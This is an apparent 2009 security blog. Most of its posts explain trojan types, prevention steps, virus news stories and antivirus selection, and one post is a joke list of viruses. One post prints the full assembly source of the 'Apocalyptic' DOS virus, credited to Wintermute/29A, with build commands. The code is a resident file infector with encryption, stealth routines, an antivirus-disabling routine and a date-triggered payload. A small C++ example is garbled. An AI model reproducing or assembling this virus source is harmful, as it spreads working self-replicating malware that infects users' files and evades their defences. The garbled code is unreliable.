Pages

Tuesday, February 24, 2009

Keylogger Trojan

Keylogger Trojan is a malicious program that steals your user name and password and logging them to a file and send to the attackers. Some keyloggers are available in the market for buying. They are generally used by the parents to track the online activities of their children and also by the people who want to track the contacts and online activities of their life partner. Some keyloggers are capable of monitering your web browser. If a desired responce is found it tracks the required information and sent to the remote attacker. The desired responce may be the opening of a site of the bank in which you may have a account. Some sites requires pointing by mouse rather than the keystrokes. This reduces some of the attack. But some trojans send the screenshot of the victims application to the remote attacker.
The keyloggers are installed in the victim's machine by making him belive that they are useful software. The most of the infection are through the P to P network.
To avoid the infection connect only to trusted network. Download softwares only from trusted sources. Use an updated Antivirus software and install a firewall.

Friday, February 20, 2009

Nuker

Nuker is a trojan that allows attacker to reboot, shut down or even crash the victim's computer which is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the IP address of the victim, the nuker sends some packets that made the victim's computer to restart, shut down or even to crash.

Removal of Nuker

The removal of Nuker is not so difficult. Most of the anti viruses available in the market is able to delete the Nukers. It can also be deleted manually. For manually disinfecting the nuker, we have to approach in different methods for different Operating Systems. The best way is to delete the malware manually and to reboot the computer. In Windows 9x and millenium Operating Systems just go to the command prompt and delete the file using the command DEL. eg. if the file name is nuke.exe in the windows folder, then just type:
DEL C:\WINDOWS\NUKE.EXE
and press ENTER key. Then reboot the system.
The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

In the case of Windows NT, 2000, XP the first thing to be done is to rename (including its extension) the nuker and then restart the computer and then delete the file manually.

The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

Note that you have to disable the system restore before manual disinfection. While renaming the file the Operating System will copy the original files to another folder for back up. This may result in the disinfection failure. So system restore must be disabled.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

Thursday, February 19, 2009

Trojan. Dropper



Trojan. Droppers are trojans that instals in a system without the informing the user about their presence. Usually virus writers and hackers create trojan droppers to install other applications or placing the backdoor applications. It was discovered in february 2000. It is also known as virus.dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP. However the threat level is low and can be easily removed.


However prevention will reduce the risk of infection. Some of the preventive measures are given below:




  • Use a firewall to block all the applications that are trying to connect the internet without your permission. This will reduce the risk even after the infection.


  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.


  • Isolate the infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software.


  • Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected.


  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.


  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put a post on disabling the autoplay in XP and vista earlier.


  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.


  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.


  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.


  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.


  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.


  • It is recommended to disable the system restore. You will get more information about enabling and diabling the system restore XP and other OS.


Disable or enable Windows Me System Restore



Disable or enable Windows XP System Restore



French Fighters Grounded by Computer Virus

The recent incidences shows that even the most systems that we think to be highly secured are vulnerable to virus attacks. The incident in which the French Navy's fighter planes were unable to download their fight plans as the databases were attacked by a Microsoft virus.
However, the French navy admitted that during the time it took to disinfect the virusThe incident forced the defence authorities to use the traditional systems like telephone, fax and post. Naval officials said the infection was probably due more to negligence than a deliberate attempt to compromise French national security. It said it suspected someone at the navy had used an infected USB key

Wednesday, February 18, 2009

Antivirus 2009- A new virus


A new threat that comes disguised as a genuine antivirus program has become
increasingly prevalent . Offering to scan and remove malware from your
PC, this rogue will actually install a Trojan on your unsuspecting system. The process is usually initiated when you click a link for what you believe is valid security software or its vendor's site.
Such adverts are not only a nuisance when browsing online -- fake ads appear on reputable sites that make use of third-party advertising -- but they are designed to rip off consumers by tempting them to pay for a worthless program. Worse still, these rogue applications infect your PC with a problem they claim can only be 'fixed' by purchasing extra software.

If you have fallen victim to this virus hoax, stop by the Help Desk immediately to reserve time for virus removal from your system.

Tuesday, February 17, 2009

Mysterious New Computer Virus May Be 'Sleeper' Agent

A computer virus that may leave Microsoft Windows users vulnerable to digital hijacking is spreading through companies in the U.S., Europe and Asia, already infecting close to 9 million machines, according to a private online security firm.

Though computer bugs have become a common affliction, Finland-based F-Secure says a virus it has been tracking for the past several weeks has surged more rapidly through corporate networks than anything they've seen in years. But the virus doesn't appear to be working as its designers intended.

F-Secure's chief security adviser, Patrik Runald, said the virus's coding suggests a type of bug that alerts computer users to bogus infections on their machines and offers to help by selling them antivirus software. Instead, the virus is simply spreading to little effect, though it may still pose a threat to infected computers.

Microsoft issued a security update Tuesday to deal with the so-called "Downadup" or "Conficker" virus, which appears to be a new version of a bug that popped up in October. "Over the last couple of weeks, a new variant of this worm has been affecting customers," the company acknowledged in a blog post.

Microsoft said the virus is spreading by gaining access to one computer and then guessing at passwords of other users in the same network: "If the password is weak, it may succeed."

A company representative couldn't immediately be reached Saturday to comment on F-Secure's estimate of infected machines. Most computers with Windows will automatically download Microsoft's security update, but Hypponen said the virus disables updates on infected machines. While the origin of the virus is a mystery, F-Secure's best guess is it came from Ukraine.

Beware of Hackers

Are you sure that you are safe while browsing the internet or while downloading anything from the internet. The anti-malware software you are downloading may be a malware or may contain malware. The hackers are now using the popular names (names of the celebrity)for making the people to download the malware or the spyware made by them. One such example is in the popular news aggregator Digg. there are reports saying that there were 52 accounts posting news stories or comments with malicious URLs. Many of these accounts purport to be news items about celebrities, including actors Christian Bale and Alyssa Milano, singer Britney Spears and Paris Hilton. They contain a link to a video about the celebrity that takes victims to the sites that downloads the Adware/VideoPlay fake anti-malware, or scareware, package when the user clicks on it. Digg reported that it have terminated more than 300 malware accounts.The Digg attacks download the MS Antispyware 2009 scareware package to victims' PCs. This pretends to scan the PCs, then tells that the computer is infected with malware. It then asks the victim to pay money through the credit card for removing the malware. The malware creators also owns blogs. They post real and fake stories about the celebrities for getting the attention of the viewer quickly. So be care in using internet and while downloading from the internet. Download only from the trusted source.

Monday, February 16, 2009

Apocalyptic

This post is about an old virus Apocalyptic. It will be detected by almost all the antivirus softwares. It appeared in 1996.

The important characteristics of this virus is:

-TSR appending Com/Exe infector
-Has a routine to encrypt and another to decrypt ( ror+add+xor )
-Stealth ( 11h/12h/4eh/4fh/5700h )
-Deactivates Tbdriver when going into mem and when infecting
-Makes the int 3h point to the int21h on infection
-Fools f-prot's 'stealth detection'
-Non-detectable ( in 2nd generation ) by Tbav 7.05, F-prot 2.23c, Scan,
-Avp and else. TbClean doesn't clean it ( it gets lost with the Z Mcb
-searching loop,... really that product is a shit )
-Payload: On 26th of July it shows all file with size 029Ah ( 666 )

To assemble the virus code, use:

Tasm virus.asm
Tlink virus.obj
Please do not think that I am promoting the creation of virus. The details I have given is available on the internet for the public. The source code of Apocalyptic is given below:

.286
HOSTSEG segment BYTE
ASSUME CS:HOSTSEG, SS:CODIGO

Host:
mov ax,4c00h
int 21h

ends

CODIGO segment PARA
ASSUME CS:CODIGO, DS:CODIGO, SS:CODIGO

virus_size equ virus_end-virus_start
encrypt_size equ encrypt_end-encrypt_start

virus_start label byte

org 0h

Letsrock:
call delta ; Entry for Com/Exe
delta:
mov si,sp ; �-offset
mov bp,word ptr ss:[si]
sub bp,offset delta
push es ax ds

push cs
pop ds
call tomacha ; I don't call encryption
;on first generation

Encrypt_start label byte

;***************************************************************************
; RESIDENCE
;***************************************************************************


goon:
push es
call tbdriver ; Deactivate TbDriver

mov ah,52h ; Pick list of lists
int 21h
mov si,es:[bx-2] ; First MCB
mov es,si

Mcb_Loop:
cmp byte ptr es:[0],'Z' ; I search last Mcb.
je got_last
cont: add si,es:[3]
inc si
mov es,si
jmp Mcb_Loop

got_last:
pop dx
cmp word ptr es:[1],0h ; Is it free ?
je go_on
cmp word ptr es:[1],dx ; Or with active Psp ?
jne exit
go_on:
cmp word ptr es:[3],((virus_size+15)/16)+1
jb exit ; Is there space for me ?

push es ; If there is, I get resident
pop ds
mov di,es
add di,word ptr es:[3] ; Residence stuff; nothing
sub di,((virus_size+15)/16) ;special
push di
mov es,di
xor di,di
xor si,si
mov cx,8
rep movsw

pop di
inc di
mov word ptr es:[3],((virus_size+15)/16)+1
mov word ptr es:[1],di

mov byte ptr ds:[0],'M'
sub word ptr ds:[3],((virus_size+15)/16)+1
mov di,5
mov cx,12
xor al,al
rep stosb

push es cs
pop ds ax
inc ax
push ax
mov es,ax
xor di,di
mov si,bp
mov cx,(virus_size)
rep movsb

mov ax,3521h
int 21h
pop ds
mov ds:word ptr [int21h],bx
mov ds:word ptr [int21h+2],es
mov ah,25h
lea dx,main_center
int 21h

;***************************************************************************
; RETURN TO HOST
;***************************************************************************

exit:
pop ds ax es

dec byte ptr [flag+bp] ; Was it a Com ?
jz era_un_com

mov si,ds ; Recover stack
add si,cs:word ptr [ss_sp+bp]
add si,10h
cli
mov ss,si
mov sp,cs:word ptr [ss_sp+bp+2]
sti

mov si,ds ; Recover CS:IP
add si,cs:word ptr [cs_ip+bp+2]
add si,10h
push si
push cs:word ptr [cs_ip+bp]

retf ; Return to host

era_un_com:
mov di,100h ; If it's a Com, I make
push di ;it to return
lea si,bp+ss_sp
movsw
movsb
ret

condiciones:
push cx dx ; Payload trigger
mov ah,02ah ; Activates on 26th july
int 21h
cmp dx,071Ah
pop dx cx
jnz nain
stc
ret
nain:
clc
ret

;***************************************************************************
; TBDRIVER
;***************************************************************************

Tbdriver:
xor ax,ax ; Annulates TBdriver,...
mov es,ax ;really, this Av is a
les bx,es:[0084h] ;megashit.
cmp byte ptr es:[bx+2],0eah
jnz volvamos
push word ptr es:[bx+3]
push word ptr es:[bx+5]
mov es,ax
pop word ptr es:[0086h]
pop word ptr es:[0084h]
volvamos: ret

;***************************************************************************
; STEALTH 05700h
;***************************************************************************

Stealth_tiempo:
pushf
call dword ptr cs:[Int21h] ; Calls Int21h
push cx
and cl,01fh
xor cl,01fh
pop cx
jnz nada
or cl,01fh ; Changes seconds
nada:
retf 2

;****************************************************************************
; FCB STEALTH
;****************************************************************************

FCB_Stealth:

pushf ; Stealth of 11h/12h, by
call dword ptr cs:[Int21h] ;FCBs
test al,al
jnz sin_stealth

push ax bx es

mov ah,51h
int 21h
mov es,bx
cmp bx,es:[16h]
jnz No_infectado

mov bx,dx
mov al,[bx]
push ax
mov ah,2fh
int 21h
pop ax
inc al
jnz Normal_FCB
add bx,7h
Normal_FCB:
mov al,es:[bx+17h]
and al,1fh
xor al,1fh
jnz No_infectado

sub word ptr es:[bx+1dh],Virus_size ; Old lenght of
sbb word ptr es:[bx+1fh],0 ;file and "normal"
and byte ptr es:[bx+17h],0F1h ;seconds

No_infectado:
call condiciones
jnc sin_nada

mov word ptr es:[bx+1dh],029Ah ; Virus's payload
mov word ptr es:[bx+1fh],0h

sin_nada:
pop es bx ax
Sin_stealth: retf 2

;****************************************************************************
; INT 21h
;****************************************************************************

main_center: ; The main center !
cmp ax,5700h
jz stealth_tiempo
cmp ah,11h
jz fcb_stealth
cmp ah,12h
jz fcb_stealth
cmp ah,4eh
jz handle_stealth
cmp ah,4fh
jz handle_stealth
cmp ah,4bh
je ejecutar
jmp saltito

;****************************************************************************
; HANDLE STEALTH
;****************************************************************************

handle_stealth:

pushf ; Handle stealth, functions
call dword ptr cs:[Int21h] ;4eh/4fh
jc adios_handle

pushf
push ax es bx cx

anti_antivirus:

mov ah,62h
int 21h

mov es,bx ; Is it F-prot ?
mov es,word ptr es:[2ch]
xor bx,bx
mov cx,100h
fpr:
cmp word ptr es:[bx],'-F'
jz sin_infectar ; Si lo es, pasamos de hacer
inc bx ;el stealth
loop fpr

mov ah,2fh
int 21h

mov al,es:[bx+16h]
and al,1fh
xor al,1fh
jnz sin_infectar

sub word ptr es:[bx+1ah],Virus_size ; Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds

sin_infectar:
call condiciones
jnc no_payload

mov word ptr es:[bx+1ah],029Ah ; payload
mov word ptr es:[bx+1ch],0h
no_payload:
pop cx bx es ax
popf
adios_handle:
retf 2

;****************************************************************************
; EXE INFECTION
;****************************************************************************

ejecutar:
pushf
push ax bx cx dx si di ds es bp

mov di,ds
mov si,dx

call tbdriver ; deactivates TbDriver

mov ax,3503h ; Int 3h points to the
int 21h ;int 21h: less size and we
push cs ;fuck'em a bit
pop ds
mov ah,25h
lea dx,saltito
int 21h
push es bx ax

mov ax,3524h ; We handle int 24h
int 3h
mov ah,25h
lea dx,int24h
int 3h
push es bx ax

mov ds,di
mov dx,si

Noloes:
mov ax,4300h ; Saves and clears file
int 3h ;attributes
mov ax,4301h
push ax cx dx
xor cx,cx
int 3h

vamos_a_ver_si_exe:

mov byte ptr [flag],00h
mov ax,3d02h ; Opens file
int 3h
jc we_close

infect: xchg ax,bx

push cs
pop ds
mov ah,3fh ; Reads header
mov cx,01ch
lea dx,cabecera
int 3h

mov al,byte ptr [cabecera] ; Makes comprobations
add al,byte ptr [cabecera+1]
cmp al,'M'+'Z'
jnz go_close
cmp word ptr [cabecera+18h],40h
jz go_close
cmp word ptr [cabecera+1ah],0
jnz go_close ; If it's all right, goes on
jmp conti

go_close:
mov ds,di
mov dx,si

buscar_final: cmp byte ptr ds:[si],0 ; Searches end in ds:si
je chequeo
inc si
jmp buscar_final

chequeo:
push cs ; Is it a .COM ?
pop es
lea di,comtxt
sub si,3
cmpsw
jne we_close
jmp infeccion_com

we_close:
jmp close

conti:
mov ax,5700h ; Time/date of file
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

call pointerant
cmp ax,0200h
ja contt
noinz: xor si,si ; To avoid changing
jmp close_ant ;date of non-infected
;files
contt:

push ax
pop si
shr ax,4
shl dx,12
add dx,ax
sub dx,word ptr ds:cabecera+8
push dx

and si,0fh
push si
call copy
pop si

pop dx
mov ds:word ptr [cs_ip+2],dx
inc dx
mov ds:word ptr [ss_sp],dx
mov ds:word ptr [cs_ip],si
mov ds:word ptr [ss_sp+2],((virus_size+100h-15h)/2)*2

call pointerant

mov cx,200h
div cx
inc ax
mov word ptr [cabecera+2],dx
mov word ptr [cabecera+4],ax
mov word ptr [cabecera+0ah],((virus_size)/16)+10h

mov ax,4200h
call pointer
mov cx,1ch
lea dx,cabecera
push cs
pop ds
mov ah,40h
int 3h

close_ant:
pop cx dx ax
or si,si
je close
inc ax
or cl,1fh
int 3h


close:

pop dx cx ax ; Attributes
inc ax
int 21h

mov ah,03eh
int 3h

nahyuck:

pop ax dx ds ; Restores Int 24h y 3h
int 3h
pop ax dx ds
int 3h

pop bp es ds di si dx cx bx ax
popf
jmp saltito

Pointerant:
mov ax,4202h
Pointer:
xor cx,cx
cwd
int 3h
ret

;****************************************************************************
; COM INFECTION
;****************************************************************************


infeccion_com:

mov ax,3d02h ; Open
int 3h
jc close
xchg bx,ax

push cs
pop ds

mov byte ptr [flag],1h ; To make the virus know it's
;a com when restoring
mov ax,5700h ; Time/date
push ax
int 3h
push dx cx
and cl,1fh
xor cl,1fh
jz close_ant

quesiquevale:
mov ah,3fh ; Reads beggining of file
mov cx,3
lea dx,ss_sp
int 3h

call pointerant ; Lenght check
cmp ax,0200h
ja puedes_seguir
cmp ax,(0ffffh-virus_size-100h)
jna puedes_seguir
alnoin: jmp noinz

puedes_seguir:
sub ax,3
mov word ptr [cabecera],ax

call copy ; Appending

mov ax,4200h
call pointer

mov ah,40h ; Jumping to code at
lea dx,salt ;beggining
mov cx,3h
int 3h

jmp close_ant

;****************************************************************************
; DATA
;****************************************************************************

autor: db 'Apocalyptic by Wintermute/29A'
comtxt: db 'COM'
flag: db 0
salt: db 0e9h
cabecera: db 0eh dup (90h)
SS_SP: dw 0,offset virus_end+100h
Checksum: dw 0
CS_IP: dw offset host,0
Cequis: dw 0,0,0,0

Encrypt_end label byte

copy:
push cs
pop ds
xor bp,bp ; Don't let bp fuck us
call encryptant ; Encrypts
mov ah,40h ; Copies
mov cx,virus_size
lea dx,letsrock
int 3h
call deencrypt ; Deencrypts
ret

;****************************************************************************
; ENCRYPT ROUTINE
;****************************************************************************

encryptant:
lea si,encrypt_end ; Encrypts
mov cx,encrypt_size
enc_loop: mov dl,byte ptr [si]
sub dl,2h
xor dl,0f9h
ror dl,4
mov byte ptr [si],dl
dec si
loop enc_loop
ret

deencrypt:
lea si,encrypt_end+bp ; Deencrypts
mov cx,encrypt_size
mov di,8
encri: mov dl,byte ptr [si]
mov al,dl
rol dl,4
xor dl,0f9h
add dl,2h
mov byte ptr [si],dl
dec si
loop encri
ret

Int24h: mov al,3
ret
Saltito: db 0eah
int21h: dw 0,0


virus_end label byte

tomacha:
mov cs:word ptr encrypt_start-2+bp,deencrypt-encrypt_start
ret
; This is cause I don't like putting a stupid flag,
; this two commands won't be copied

CODIGO ends
END Letsrock

VSTACK segment para STACK 'Stack'

db 100h dup (90h)

ends

Sunday, February 15, 2009

Some New Viruses

OPRAH WINFREY VIRUS:
Your 200MB hard drive suddenly shrinks to 80MB, and then slowly expands back to 200MB.

AT&T VIRUS:
Every three minutes it tells you what great service you are getting.

MCI VIRUS:
Every three minutes it reminds you that you're paying too much for the AT&T virus.

PAUL REVERE VIRUS:
This revolutionary virus does not horse around. It warns you of impending hard disk attack---once if by LAN, twice if by C:>.

POLITICALLY CORRECT VIRUS:
Never calls itself a "virus", but instead refers to itself as an "electronic microorganism."

RIGHT TO LIFE VIRUS:
Won't allow you to delete a file, regardless of how old it is. If you attempt to erase a file, it requires you to first see a counselor about possible alternatives.

ROSS PEROT VIRUS:
Activates every component in your system, just before the whole darn thing quits.

MARIO CUOMO VIRUS:
It would be a great virus, but it refuses to run.

TED TURNER VIRUS:
Colorizes your monochrome monitor.

ARNOLD SCHWARZENEGGER VIRUS:
Terminates and stays resident. It'll be back.

DAN QUAYLE VIRUS #2:
Their is sumthing rong wit your komputer, ewe jsut cant figyour out watt!

GOVERNMENT ECONOMIST VIRUS:
Nothing works, but all your diagnostic software says everything is fine.

NEW WORLD ORDER VIRUS:
Probably harmless, but it makes a lot of people really mad just thinking about it.

FEDERAL BUREAUCRAT VIRUS:
Divides your hard disk into hundreds of little units, each of which does practically nothing, but all of which claim to be the most important part of your computer.

GALLUP VIRUS:
Sixty percent of the PCs infected will lose 38 percent of their data 14 percent of the time. (plus or minus a 3.5 percent margin of error.)

TERRY RANDALL VIRUS:
Prints "Oh no you don't" whenever you choose "Abort" from the "Abort" "Retry" "Fail" message.

TEXAS VIRUS:
Makes sure that it's bigger than any other file.

ADAM AND EVE VIRUS:
Takes a couple of bytes out of your Apple.

CONGRESSIONAL VIRUS:
The computer locks up, screen splits erratically with a message appearing on each half blaming the other side for the problem.

AIRLINE VIRUS:
You're in Dallas, but your data is in Singapore.

FREUDIAN VIRUS:
Your computer becomes obsessed with marrying its own motherboard.

PBS VIRUS:
Your programs stop every few minutes to ask for money.

ELVIS VIRUS:
Your computer gets fat, slow and lazy, then self destructs; only to resurface at shopping malls and service stations across rural America.

OLLIE NORTH VIRUS:
Causes your printer to become a paper shredder.

NIKE VIRUS:
Just does it.

SEARS VIRUS:
Your data won't appear unless you buy new cables, power supply and a set of shocks.

JIMMY HOFFA VIRUS:
Your programs can never be found again.

CONGRESSIONAL VIRUS #2:
Runs every program on the hard drive simultaneously, but doesn't allow the user to accomplish anything.

KEVORKIAN VIRUS:
Helps your computer shut down as an act of mercy.

IMELDA MARCOS VIRUS:
Sings you a song (slightly off key) on boot up, then subtracts money from your Quicken account and spends it all on expensive shoes it purchases through Prodigy.

STAR TREK VIRUS:
Invades your system in places where no virus has gone before.

HEALTH CARE VIRUS:
Tests your system for a day, finds nothing wrong, and sends you a bill for $4,500.

GEORGE BUSH VIRUS:
It starts by boldly stating, "Read my docs....No new files!" on the screen. It proceeds to fill up all the free space on your hard drive with new files, then blames it on the Congressional Virus.

CLEVELAND INDIANS VIRUS:
Makes your 486/50 machine perform like a 286/AT.

LAPD VIRUS:
It claims it feels threatened by the other files on your PC and erases them in "self defense".

CHICAGO CUBS VIRUS:
Your PC makes frequent mistakes and comes in last in the reviews, but you still love it.

ORAL ROBERTS VIRUS:
Claims that if you don't send it a million dollars, it's programmer will take it back.

Friday, February 13, 2009

Windows 7: Security

Most of the viruses were created for windows. So more security features has to be added to defend the system from virus and malware threats. The newer version of Windows are less vulnerable to virus attacks. Windows Vista incorporates several security features which makes it more secure from virus attacks. It has been developed to tackle with the viruses that spread through the removable media such as pen drives, CDs etc. Windows 7 extends this protection to cover removable drives with BitLocker ToGo.The new Internet Explorer 8 will sport new security features such as InPrivate Browsing that allows you to surf the Web in full anonymity a SmartScreen feature to protect against phishing attacks.
But there are limitations also in Windows 7. In Windows Vista the user was informed with a pop-up window and ask for his confirmation if a program tries to change any thing in the OS. But this feature became a irritation to most of the users. This feature has been modified to a great extend. Now the pop-up will appear a fewer times. Some people reported that this modification may let the malware to hide in the OS securely. The pop-ups appear only when a software makes changes to itself automatically. There are criticism about the administrator account. Some people argue that some software can modify the account settings and it can take the administrator account and gets the control of the whole computer. More security features are incorporated in Windows Vista. But the pop-ups that warned that asks the user's confirmation were disliked by many users.

You will get more information about the BitLocker ToGo from PCMAG.COM

Reading the memory size

In the older post I have told that the memory size of the RAM is calculated during the RAM test performed during the Booting. The size of the RAM is stored in the memory location 0x413 and 0x414. Here is a C program which calculates the memory size of your RAM in KB. The limitation of this program is that it shows the memory size excluding the expanded and extended memory. It only shows size only up to 640 KB. If you are using the RAM which has more capacity, it shows the 640 as your RAM size. The program is shown below:


#include
#include

void main()
{
int far* mem;
mem=(int far*)0x413;
printf("\nBase memory size=%u KB",*mem);
getch();
}

There is another way to find out the RAM size. This way also have the above mentioned limitations. The below is a CPP program which calculates the RAM size by using the function biosmemory().


#include
#include
#include

void main()
{
int mem;
mem=biosmemory();
cout<<"The size of your RAM is:"<getch();
}

Note that the output of the program is limited to 640 KB

Wednesday, February 4, 2009

Virus attack at London hospitals

Three hospitals in London are reported to shut down their entire computer network due to the infection by a variant of Mytob worm. The hospitals that are subjected to attack are St Bartholomew's (also known as Barts) in the City, the Royal London Hospital in Whitechapel and The London Chest Hospital in Bethnal Green. Some sources reports that these attacks are completely avoidable.
The virus infects the windows applications and spread itself to all the e-mail address of the infected computers. The hospitals have reported that the incident has affected the well being of the patients. There was no evidence in relation to the attacks on the safety of the patients. The manual systems have been implemented for the purpose of the restoring the computer services with top priority given to the patient service.
The trust says that they have used anti virus software and it was updated daily. But it was wrongly configured in some computers. This left open a back door through which the Mytob rapidly infiltrated the trust's network of 4,700 PCs. Anti-virus software companies have known about Mytob since 2005. Theatre operations were postponed, though they were immediately restored. Staff deferred patient appointments as doctors were unable to make safe and effective clinical decisions because they could not access diagnostic results on computers.

You will get more information from
http://www.bartsandthelondon.org.uk/formedia/press/release.asp?id=2054&sid=10
http://www.computerweekly.com/Articles/2009/01/28/234477/virus-attack-at-london-hospitals-was-entirely-avoidable.htm

Sunday, February 1, 2009

AntiViruses: How to choose?

An unprotected computer is like a bank without security. Thieves can easily loot money and valuable properties kept in it. The unprotected computer is easily vulnerable to attacks by several malicious software. Every year hundreds of malicious software like viruses, spyware, trojan etc are released into the cyberspace. Some people not even realize that malware is every where and avoiding infection by malware is a very difficult task. Sometimes they won't realize that they have became of a malware attack. There are several malwares roaming throught the internet. Most of them are spywares. The viruses are made by skilled and experienced programmers around the world. Some malwares are meant to destroy your computer or your reputation. More than eighty percent of the computers around the world are infected by malwares. These malwares are also domonated by the spywares.
Spywares are application that are installed in our computer pretending to be some useful program. The spyware are commonly installed in browsers and can read the username and the password we enter to access our accounts. There is another type of malware called rootkits. They are created by hackers for accessing your computer without your knowledge for some illegal activities. You may be blamed for the action performed by the hacker using the rootkit installed in your computer. For protecting the system from the hazards of malwares we have to install a proper AntiVirus softwares.

Things to be taken in to care while choosing an AntiVirus

There are different antiviruses available in the market. These antiviruses has its own advantages and limitations as they are produced by different companies. AntiViruses are available for different plateforms and requirements. Care should be taken in choosing the antivirus. Some useful tips in choosing the antivirus softwares are given below:

  • Capability of detecting malwares:
The capability of detecting alwares mostly depends on the database of the antivirus. If the database is large, it can detects more malwares. The database contains the codes of malwares. So as the number of entries increases, the size of the database increases and the software can detect more malwares.
  • Capability of cleaning or isolating the infected files:
Most of the antiviruses available today includes the capability of cleaning the infected files. If cleaning cannot be performed then the infected files are isolated. The capability of cleaning is different for different antivirses. Most of them cannot clean the infected file effectively. However they can effectively isolate the infected file. But this may result in the data loss or the malfunctioning of the some useful programs. So a powerful antivirus which has the caoability of cleaning the file has to be used.
  • User-Friendly:
Most of the antiviruses have very good graphical user interface. This allows the user to use the antivirus in the most effective way. He can exploit the antivirus to its maximum. Good user interface allows a person who has less knowledge about the computer to use the software effectively.

  • Availability of the updates:
Updating an antivirus is a very important thing to be taken care of. Most of the people think that there is not much use in updating the antivirus. Updating enables the antivirus software to detect new viruses. During updating the codes of the new viruses are entered into the database of the antivirus. So check for the availability of the updates. Most of the antiviruses provides updates periodically.

  • Refer the sites cintainig AntiVirus reviews:
These sites helps to choose the antiviruses according to our needs. They lists the advantages and limitaions of different antiviruses. I have given some of the sites below:

http://anti-virus-software-review.toptenreviews.com/
http://www.consumersearch.com/antivirus-software

http://www.pcantivirusreviews.com/
http://www.reviewcentre.com/products2167.html